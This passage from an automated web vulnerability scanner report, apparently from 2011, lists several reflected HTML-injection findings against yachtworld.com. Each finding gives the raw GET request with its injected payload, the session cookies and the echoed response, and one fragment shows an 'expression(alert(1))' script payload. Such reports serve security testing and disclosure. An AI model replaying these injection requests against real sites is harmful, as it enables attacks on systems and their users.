%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:12:28 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Bowrider/18dec9"style="x:expression(alert(1))"86969decf0f/1">
...[SNIP]...

3.178. http://www.yachtworld.com/boats/Power/Bowrider/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Bowrider/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 445db"><a>5170e3f155d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Bowrider/1445db"><a>5170e3f155d HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:00:16 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Bowrider/1445db"><a>5170e3f155d/1">
...[SNIP]...

3.179. http://www.yachtworld.com/boats/Power/Center+Console/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Center+Console/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0bb7"><a>2f954481696 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Center+Console/1b0bb7"><a>2f954481696 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:44 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Center+Console/1b0bb7"><a>2f954481696/1">
...[SNIP]...

3.180. http://www.yachtworld.com/boats/Power/Convertible+Boat/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Convertible+Boat/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65249"><a>ad6efc06b7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Convertible+Boat/165249"><a>ad6efc06b7b HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:58:59 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Convertible+Boat/165249"><a>ad6efc06b7b/1">
...[SNIP]...

3.181. http://www.yachtworld.com/boats/Power/Cruiser/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Cruiser/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bdf3"><a>e8b8bf62b65 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Cruiser/17bdf3"><a>e8b8bf62b65 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:16 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<a class="navFirst" href="/boats/Power/Cruiser/17bdf3"><a>e8b8bf62b65/1">
...[SNIP]...

3.182. http://www.yachtworld.com/boats/Power/Cuddy+Cabin/1 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/boats/Power/Cuddy+Cabin/1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1827"><a>25a1139d12e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /boats/Power/Cuddy+Cabin/1c1827"><a>25a1139d12e HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg